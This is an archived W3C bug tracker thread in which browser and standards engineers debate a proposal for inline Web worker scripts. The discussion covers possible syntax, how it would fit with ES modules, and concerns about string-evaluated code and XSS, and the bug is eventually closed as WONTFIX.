This is an archived snapshot of W3C's public bugzilla bug tracker, decommissioned in April 2019. Please see the home page for more details.

Bug 22700 - Inline Web worker scripts
Summary: Inline Web worker scripts
Status: RESOLVED WONTFIX
Alias: None
Product: WHATWG
Classification: Unclassified
Component: HTML (show other bugs)
Version: unspecified
Hardware: Other other
: P3 enhancement
Target Milestone: Unsorted
Assignee: Domenic Denicola
QA Contact: contributor
URL:
Whiteboard: blocked on dependencies
Keywords:
Depends on: 25868
Blocks:
  Show dependency treegraph
 
Reported: 2013-07-16 18:10 UTC by Ian 'Hixie' Hickson
Modified: 2016-03-16 14:09 UTC (History)
12 users (show)

See Also:


Attachments

Description Ian 'Hixie' Hickson 2013-07-16 18:10:19 UTC
On Tue, 20 Nov 2012, Elliott Sprehn wrote:
>
> This has come up a couple times with developers and I think being able
> to do:
>
> <script type="worker" id="taskQueue">
>   ...
> </script>
>
> and then being able to access the worker to post message it by id would
> be extremely useful.
>
> document.getElementById('taskQueue').worker.postMessage(...);
>
> Forcing the code into a separate file or requiring a data URL is
> annoying.
Comment 1 Ian 'Hixie' Hickson 2014-05-16 21:48:42 UTC
Is this something anyone else would be interested in implementing?
Comment 2 Jonas Sicking (Not reading bugmail) 2014-05-16 23:06:42 UTC
This is definitely something we're interested in. Though it's very unclear to me what the syntax should be.

A lower-level solution than the one in comment 0 would be something like:

new InlineWorker("script here");

This would also allow solving use cases like dynamically generated code.

Note though that both this and the solution in comment 0 is basically syntax sugar for:

new Worker(URL.createObjectURL(new Blob(["code here"])));
or
new Worker(URL.createObjectURL(
  new Blob([document.getElementById('taskQueue').textContent])));

(in fact, the syntax in comment 0 could probably be implemented using custom elements).



However something like

function doSomeWork(...) {
  var a, b, c = x();

  function doAsyncWork(...) {
    ...
  }

  return new Promise((resolve, reject) => {
    w = new InlineWorker(doAsyncWork);
    w.postMessage(a);
    w.onmessage = (e) => resolve(e.data);
  });
}

would be even more awesome, especially if it would allow dependent scope of doAsyncWork to be cloned into the worker. But this requires new ES primitives.
Comment 3 Anne 2014-05-18 12:36:59 UTC
I've been thinking about having something like

  <script type=worker>
    ...
  </script>

  <script>
    document.querySelector("script").port.postMessage("hey worker")
  </script>

or maybe even

  <worker>

  </worker>

if the whole <module> thing goes ahead.
Comment 4 Domenic Denicola 2014-05-18 16:42:27 UTC
Relatedly, we still need a story for loading modules as workers:

https://github.com/dherman/web-modules/issues/3

I think the same considerations would apply though. Although perhaps it would change Anne's proposal to be `<script type="worker">` + `<module type="worker">`.

Also anything that works for inline `<script>/`<module>` should work for ones with `src`. So e.g.

<script type="worker" src="/path/to/worker.js"></script>
<script>
  document.querySelector("script[type='worker']").port.postMessage("hey worker");
</script>

(and the above should be the same with s/script/module/g.)
Comment 5 Ian 'Hixie' Hickson 2014-05-19 20:00:04 UTC
Please file a new bug for the module integration. Thanks!
Comment 6 Dave Herman 2014-05-27 22:00:38 UTC
I worked through some of the design space today. There are a number of variables here and they have to be useful in combination with each other, which leads to a fairly large combinatorial space. Write-up here:

https://gist.github.com/dherman/8b138ebf3eb0f322644b

Here's my overall take on this:

* It should be `<script module>` not `<script type="module">`. (I'll say more about that in Bug 25868.)

* If we have HTML syntax for `worker`, it should be an attribute rather than a type. This way it can be used in combination with other attributes like `module`.

* However, I'm unconvinced it's worth having HTML syntax for the case of workers. I think it adds confusion (`<script worker module>` is pretty o.O) without enough value, and we should just focus on improving the JS API ergonomics.

* I don't think subclassing `Worker` is going to work well here because we have a proliferation of kinds of workers already -- `Worker`, `SharedWorker`, service worker, perhaps more coming? -- and they all need to be able to use these degrees of variability. A reasonable step forward would be to have a new `Work` type that we can backwards-compatibly overload all of those constructors to accept instead of DOMString. That way you could do e.g.:

var worker = new SharedWorker(new Work({
  source: "console.log('hello from a worker')",
  script: true
}));

This way we don't have to create a combinatorial explosion of subclasses of `Worker`. This still isn't ideal from an ergonomics standpoint, but it's an improvement over creating object URLs. We could later create one or two convenience functions for the most common combinations.

Dave
Comment 7 Boris Zbarsky 2014-05-28 01:11:59 UTC
You don't even need the "new Work" bit if you just use a dictionary.  So:

  var worker = new SharedWorker({
    source: "console.log('hello from a worker')",
    script: true
  });
Comment 8 Dave Herman 2014-05-28 03:09:17 UTC
I believe that breaks compat, since the current behavior coerces objects to strings, no?

Dave
Comment 9 Boris Zbarsky 2014-05-28 03:55:10 UTC
That's true, but does anyone depend on the current behavior in practice?  I suspect the answer is "no".
Comment 10 Dave Herman 2014-05-28 04:11:12 UTC
If we can get away with it the ergonomics are far better. Ideally we could eliminate the coercion entirely and test for typeof 'string'; doing a test for "is it a 'plain object'" is bad practice.

Dave
Comment 11 Boris Zbarsky 2014-05-28 04:15:19 UTC
If we basically overload a DOMString and a dictionary, then the WebIDL overload resolution will effectively check for "typeof == object or typeof == undefined" and take the dictionary path if so, else coerce to string.  Well, except for RegExp and Date objects, for reasons that don't make too much sense to me; those will get coerced to string.  If someone does |new Worker(new Date())| I claim any behavior is governed by GIGO.
Comment 12 Ian 'Hixie' Hickson 2014-05-28 05:32:03 UTC
I would be very skeptical of any API that takes a string and evaluates it. The authoring ergonomics of this encourage very bad practices like:

   var worker = new Worker({
     source: "console.log('hello " + name + "')"
   });

Having APIs with affordances like this has been one of the Web's weaknesses.

That's why I like the idea of an inline <script type=worker>-style solution, as opposed to an API that takes a string.

Can you elaborate on why you didn't like that approach?
Comment 13 Anne 2014-05-28 09:59:46 UTC
(In reply to Ian 'Hixie' Hickson from comment #12)
> Can you elaborate on why you didn't like that approach?

The reason seems to be that we have many different types of workers. However, shared workers and service workers cannot be bootstrapped via a string, they need to be a network resource, so the problem with combinatorial explosion might be less bad than Dave thinks.
Comment 14 Anne 2014-05-28 10:58:22 UTC
Dave, I have a hard time seeing how <script module> is an improvement over <script type=module> if the *long term* idea is still <module>. Short term the type attribute would be required.

Also, what is a "worker module"? A concurrent module? Presumably we want something better for something like that than the postMessage() API. E.g. the ability to import/export things that return promises. Or not?
Comment 15 Dave Herman 2014-05-28 13:12:18 UTC
Ian: what's wrong with creating a worker from a source string? I don't understand why you call that a bad practice.

Re: doing it in HTML, it's not that I'm opposed to it in principle, but we don't need all the dials and knobs in HTML; it should have high level forms for the most common cases. But the programmatic layer should support the full generality of all possibilities.

Anne: a worker that executes a Module instead of a Script is exactly what the <module> tag is. It's top level code that can use the import syntax. We need to be heading for a world where no one has to use the Script non-terminal anymore, nor importScripts.

Dave
Comment 16 Dave Herman 2014-05-28 13:15:24 UTC
Anne: forgot to say, I'm not objecting to script type=module on ergonomic grounds; as you say the end game is that <module> is the new <script>. It simply fails to allow combining multiple attributes unless we allow e.g. script type="module worker".

Dave
Comment 17 Anne 2014-05-28 13:25:51 UTC
Dave, I'm still confused. Using your proposed syntax and ignoring the type attribute problem: <script module> == <module>, <script worker> == new Worker(new Work(...)) (as explained shared workers and service workers cannot use this, they require the URL), <script module worker> == ? It's the last one that's confusing to me.

And Ian is objecting to eval()-style generation of scripts being highly prone to XSS attacks.
Comment 18 Jonas Sicking (Not reading bugmail) 2014-05-28 17:55:48 UTC
> I would be very skeptical of any API that takes a string and evaluates it.
> The authoring ergonomics of this encourage very bad practices like:
> 
>    var worker = new Worker({
>      source: "console.log('hello " + name + "')"
>    });
> 
> Having APIs with affordances like this has been one of the Web's weaknesses.

I don't see any difference between that and <script type=worker>. <script type=worker> will simply lead to

var s = document.createElement("script");
s.textContent = "console.log('hello " + name + "')";
document.appendChild(s);

Or using document.write() to similarly create the <script> markup.

Or doing the same thing serverside.

I agree that we have a problem that we don't have a way to create an execution environment that contains a mixture of trusted script and untrusted values. But I don't think inline <script>s address that any better than taking a string and evaluating it.

One thing we could do is something like:

  var worker = new SharedWorker({
    source: "console.log('hello ' + self.arguments.name)",
    arguments: {
      name: name
    },
    argumentTransfer: [],
  });
Comment 19 Ian 'Hixie' Hickson 2014-05-28 18:14:45 UTC
Please move the module syntax discussion to bug 25868. Thanks.

(In reply to Dave Herman from comment #15)
> Ian: what's wrong with creating a worker from a source string? I don't
> understand why you call that a bad practice.

It's essentially the same as eval, and has all the same problems, as far as I can tell. The main problem is as I described above, it encourages string-based code manipulation.


> Re: doing it in HTML, it's not that I'm opposed to it in principle, but we
> don't need all the dials and knobs in HTML; it should have high level forms
> for the most common cases. But the programmatic layer should support the
> full generality of all possibilities.

I don't think I agree with this as a general principle. Some things belong at the markup level, some things belong in scripted APIs, some things belong in CSS, some things belong in HTTP, etc.

But in any case, we already have a way to do this from JS. You "just" construct a data: URL for the script and execute that. This bug is just about adding a more convenient way of doing that.
Comment 20 Ian 'Hixie' Hickson 2014-05-28 18:16:46 UTC
(It's true that people do the same with HTML. But I think the additional friction is still helpful, for the same reason that eval is worse for this than <script>.)
Comment 21 Jonas Sicking (Not reading bugmail) 2014-05-28 18:27:21 UTC
Do we have any data indicating that eval() is causing more problems than <script> is? My very non-scientific experience is the opposite. I.e. I hear about more XSS attacks having happened due to <script>, than due to eval().
Comment 22 Dave Herman 2014-05-28 19:06:53 UTC
OK sorry, let me try to explain better. The Script non-terminal in ES6 does not allow declarative `import` syntax (e.g., `import foo from "foo";`), but the Module non-terminal does. So if you have a top-level Script that wants to load libraries, it has to use the callbacky reflective API  (`System.import("foo").then(function(foo) { ... })`) instead of the normal declarative syntax.

Generally, we need to get to a place where any part of the platform that executes scripts can also execute the Module non-terminal, so that you can write your top-level code to declaratively import their dependencies. The <module> tag is one such case: it accepts the Module non-terminal, and is forcibly async so that importing doesn't block the main thread.

Workers are another such case: it should be possible to load a Worker that uses a bunch of modules and declaratively imports them from its top level code:

  import dict from "dict";
  import _ from "underscore";
  ...

This is a worker whose top level is a Module rather than a Script.

As for the XSS concern: the current design doesn't serve as a real deterrent for XSS or force people to think carefully about how they dynamically create a worker from source. All it does is force them to Google for a userland workaround or download a library that does the workaround for them, which jumps through the createObjectURL hoops. And then they tend to forget to revoke the URL afterwards, leaking memory. Here are some real-world examples of people doing the createObjectURL workaround:

* https://developer.mozilla.org/en/docs/Web/Guide/Performance/Using_web_workers#Embedded_workers
* https://coderwall.com/p/5te2lg
* https://market.sencha.com/extensions/ext-ux-webworker
* https://gist.github.com/tiffon/4368560
* http://blog.namangoel.com/replacing-eval-with-a-web-worker

Every single one of those links provides an implementation that fails to revoke the object URL. This isn't protecting anyone, and instead it's causing problems of its own.

Dave
Comment 23 Dave Herman 2014-05-28 19:11:11 UTC
(Re: moving the modules conversation, I'm only talking about modules here insofar as it affects the design of inline workers, which is what this bug is about.)
Comment 24 Dave Herman 2014-05-28 19:28:38 UTC
> > Re: doing it in HTML, it's not that I'm opposed to it in principle, but we
> > don't need all the dials and knobs in HTML; it should have high level forms
> > for the most common cases. But the programmatic layer should support the
> > full generality of all possibilities.
> 
> I don't think I agree with this as a general principle. Some things belong
> at the markup level, some things belong in scripted APIs, some things belong
> in CSS, some things belong in HTTP, etc.

Having things that HTML can do but that aren't given convenient JS entry points is a real problem in the web platform. It means that the resolve a relative URL you programmatically create an a tag. It means that to parse RGB you programmatically create a element, style it, and call .getComputedStyle(). These kinds of nuisances are the status quo in web development.

> But in any case, we already have a way to do this from JS. You "just"
> construct a data: URL for the script and execute that. This bug is just
> about adding a more convenient way of doing that.

Creating artificial minor inconveniences doesn't provide extra security. It just causes people to route around the problem, whether via copy-pasting from Stack Overflow or using a library.

Dave
Comment 25 Dave Herman 2014-05-28 19:47:31 UTC
Just chatted with Anne on IRC and he helped me realize that

<script type="module">
<script type="worker">

are fine as long as the latter automatically uses the Module non-terminal. More generally, going forward, any new script context we add should use the Module non-terminal.

This avoids proliferation of mode switches; <script type="worker"> is much nicer than <script worker module>.

Down the road we could also have

<module type="worker">

which would be identical to

<script type="worker">

Dave
Comment 26 Domenic Denicola 2014-05-28 20:15:51 UTC
If we're adding new tags anyway, let's go for broke, and add `<worker>` alongside `<module>`.

Dave, I wonder if the imperative API for worker-module creation should mirror, or otherwise be related to, the imperative API for module creation? Which IIRC is:

System.define("module name", `// lots of
// js source
// goes here`);
Comment 27 Ian 'Hixie' Hickson 2014-05-28 21:45:41 UTC
Let's first figure out the worker syntax (that's bug 25868) before we try to work out how inline workers might work. It's not even clear that anyone wants to implement inline workers in the first place.
Comment 28 Anne 2014-05-29 09:12:59 UTC
Assuming you meant first figure out the *module* syntax, sounds fine to me.
Comment 29 Ian 'Hixie' Hickson 2014-05-29 18:27:49 UTC
Er, right, my bad.
Comment 30 Domenic Denicola 2016-01-22 06:57:09 UTC
Moved discussion of worker modules to https://github.com/whatwg/html/issues/550. Leaving this bug open if we ever want to come back to the idea of inline workers.
Comment 31 Anne 2016-03-16 14:09:48 UTC
Let's close this. If it comes up again there's likely a concrete proposal involved. This thread has a lot of <script type=module> confusion.